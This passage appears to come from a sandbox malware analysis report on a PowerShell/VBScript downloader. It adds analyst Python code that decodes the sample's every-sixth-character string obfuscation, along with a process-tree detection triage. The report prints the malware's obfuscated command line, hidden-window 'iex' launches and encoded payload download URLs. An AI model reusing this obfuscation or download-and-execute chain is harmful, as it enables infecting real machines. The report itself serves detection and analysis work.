DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8173
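The PowerShell stage that wscript.exe spawns above hides every string behind a helper (named gaardspladsens in the command line) that keeps only every sixth character of a filler-padded literal, starting at offset 5, and stops one character short of the end. The Substring width comes from $Bellisserne, which is only incremented from $null to 1 when ${host}.CurrentCulture is set, so in an emulator that does not populate the host object every string decodes to nothing. The memory strings higher up show a second layer as well: the same URLs appear both with "ual" and with "e" (pinualapplualtualch.aual next to pineappletech.ae), so "ual" is a stand-in for "e". The decoder below is added analyst tooling, not code from the sample or from Joe Sandbox; the three literals it decodes are copied verbatim from the command line above, and the "ual" mapping is inferred from those string pairs rather than read from code. Note that the longer literals on this page (the User-Agent value, the URL pair, the cmd.exe echo line) had runs of spaces collapsed during extraction and will not decode cleanly from the page text; run the decoder against the script as captured from disk or process memory instead.

```python
"""Decoder for the string obfuscation in the PowerShell stage spawned by
wscript.exe. Added analyst tooling; not code from the sample or Joe Sandbox.

It re-implements the sample's helper (gaardspladsens in the command line):

    $Dafter135 = $Agerendes.Length - $Bellisserne
    For ($i = 5; $i -lt $Dafter135; $i += 6) {
        $out += $Agerendes.Substring($i, $Bellisserne)
    }

Every sixth character from offset 5 is payload, the other five are filler,
and the final filler chunk is dropped by the Length - 1 bound. $Bellisserne
only becomes 1 when ${host}.CurrentCulture is set (a real PowerShell host);
when it stays $null the Substring width is 0 and nothing decodes.
"""
import re


def decode_every_sixth(blob, offset=5, stride=6, width=1):
    """Mirror of gaardspladsens. width=0 reproduces the 'no host culture' case."""
    limit = len(blob) - width                      # $Agerendes.Length - $Bellisserne
    return "".join(blob[i:i + width] for i in range(offset, limit, stride))


def unmangle(s, token="ual", plain="e"):
    """Second layer seen in the memory strings: 'ual' stands for 'e'
    (pinualapplualtualch.aual -> pineappletech.ae). Inferred from the paired
    strings in this report, not read from the sample's code."""
    return s.replace(token, plain)


def decode_assignments(script, fn="gaardspladsens"):
    """Map every `$Var = gaardspladsens '<blob>'` in the script to its decoded value."""
    pat = re.compile(r"\$(\w+)\s*=\s*" + re.escape(fn) + r"\s+'([^']*)'")
    return {name: decode_every_sixth(blob) for name, blob in pat.findall(script)}


def decode_all_literals(script, fn="gaardspladsens"):
    """Decode every literal handed to the helper, assigned or not; the sample
    also calls it inline, e.g. sanktionjtr (gaardspladsens '...')."""
    pat = re.compile(re.escape(fn) + r"\s+'([^']*)'")
    return [decode_every_sixth(blob) for blob in pat.findall(script)]


# Fragment copied verbatim from the command line in this report: three
# literals that survived extraction intact (no collapsed whitespace).
SAMPLE_FRAGMENT = (
    "$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e "
    "ExcenRubritDefin ';$Deaktiverende=gaardspladsens 'panor> atol ';"
    "$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';"
)

if __name__ == "__main__":
    for name, value in decode_assignments(SAMPLE_FRAGMENT).items():
        print("$" + name + " = " + repr(value))
    # Layer two, on a URL taken from the memory strings above.
    print(unmangle("https://www.pinualapplualtualch.aual/na/mg.vbs"))
    # What an emulator without a host culture would see.
    print(repr(decode_every_sixth("Bru.hiBlideeRut,exFyl e ", width=0)))
```

Decoding the fragment yields $Fangstknivens = "User-Agent", $Deaktiverende = ">" and $Emanciperingerne = "iex", which is the alias the sanktionjtr helper dot-sources every later stage through; the ">" is the separator between the two download URLs in the $Unyttigst literal (almrwad and erp-royal-crown.info in the memory strings above).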
          Source: classification engineClassification label: mal100.expl.evad.winPS1@11/13@4/4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdf
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_flocgjrv.ukm.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: ap.ps1ReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
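The process chain recorded above is what the Sigma hits in this report key on: PowerShell started with -ExecutionPolicy unrestricted, a hidden-window child that Invoke-Expressions a path under C:\Users\Public, wscript.exe run on a script dropped in C:\Users\Public, and wscript.exe in turn spawning a PowerShell with an 8173-character command line. The triage below is an added example of turning those observations into checks over process-creation records; it is not Joe Sandbox, Sigma, or sample code. The event records are constructed from the "Process created" lines above, the field names (parent_image, image, command_line) and the 4096-character threshold are this example's own choices rather than a product schema or a published rule, and the obfuscated command line is stood in for by its opening plus filler padded to the length the report recorded.

```python
"""Process-tree triage for the execution chain in this report. Added example;
not Joe Sandbox, Sigma, or sample code. The checks mirror what the report's
Sigma hits key on: a Windows Script Host process spawning PowerShell,
PowerShell run with a hidden window or an oversized command line, an
-ExecutionPolicy downgrade, Invoke-Expression on the command line, and
PowerShell launching a script out of C:\\Users\\Public.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
LONG_CMDLINE = 4096  # threshold chosen for this example; tune to your baseline

HIDDEN_RE = re.compile(r"-w(?:in(?:dowstyle)?)?\s+hidden", re.I)
POLICY_RE = re.compile(r"-e(?:xecutionpolicy|p)?\s+(?:unrestricted|bypass)", re.I)
IEX_RE = re.compile(r"\biex\b|invoke-expression", re.I)
PUBLIC_RE = re.compile(r"\\users\\public\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of findings for one process-creation record."""
    image, parent = basename(event["image"]), basename(event["parent_image"])
    cmd = event["command_line"]
    findings = []
    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        findings.append("wscript/cscript spawned PowerShell")
    if image in POWERSHELL:
        if len(cmd) >= LONG_CMDLINE:
            findings.append(f"oversized PowerShell command line ({len(cmd)} chars)")
        if HIDDEN_RE.search(cmd):
            findings.append("hidden window")
        if POLICY_RE.search(cmd):
            findings.append("execution policy downgrade")
        if IEX_RE.search(cmd):
            findings.append("Invoke-Expression in command line")
    if parent in POWERSHELL and image in SCRIPT_HOSTS and PUBLIC_RE.search(cmd):
        findings.append("PowerShell launched a script from C:\\Users\\Public")
    return findings


def triage(events):
    """Index -> findings for every record that tripped at least one check."""
    hits = {}
    for i, event in enumerate(events):
        findings = evaluate(event)
        if findings:
            hits[i] = findings
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WS = r"C:\Windows\System32\wscript.exe"

# Stand-in for the 8173-character obfuscated command line: its opening,
# padded with filler to the length the report recorded (constructed).
OBF_CMDLINE = ('"' + PS + '" "cls;write \'Anetholes Klosetternes Venushaar Paralalia Unyttigst\';'
               "If (${host}.CurrentCulture) {$Bellisserne++;}").ljust(8173, "X")

# Records constructed from the "Process created" entries in this report.
EVENTS = [
    {"parent_image": "unknown", "image": PS,
     "command_line": '"' + PS + r'" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1"'},
    {"parent_image": PS, "image": PS,
     "command_line": '"' + PS + '" -win hidden =iex "[Environment]::GetEnvironmentVariable(\'public\') + \'\\\\utwxgh.vbs\'"'},
    {"parent_image": PS, "image": WS,
     "command_line": r'"C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs"'},
    {"parent_image": WS, "image": PS, "command_line": OBF_CMDLINE},
    {"parent_image": PS, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"'},
]

if __name__ == "__main__":
    for idx, findings in triage(EVENTS).items():
        print(idx, basename(EVENTS[idx]["image"]), findings)
```

Four of the five records trip at least one check; the cmd.exe echo of %appdata% does not on its own, which is why it is worth keeping the wscript-to-PowerShell and hidden-window findings as the alerting signals and treating the cmd.exe child as context for the same tree rather than a separate detection.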
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
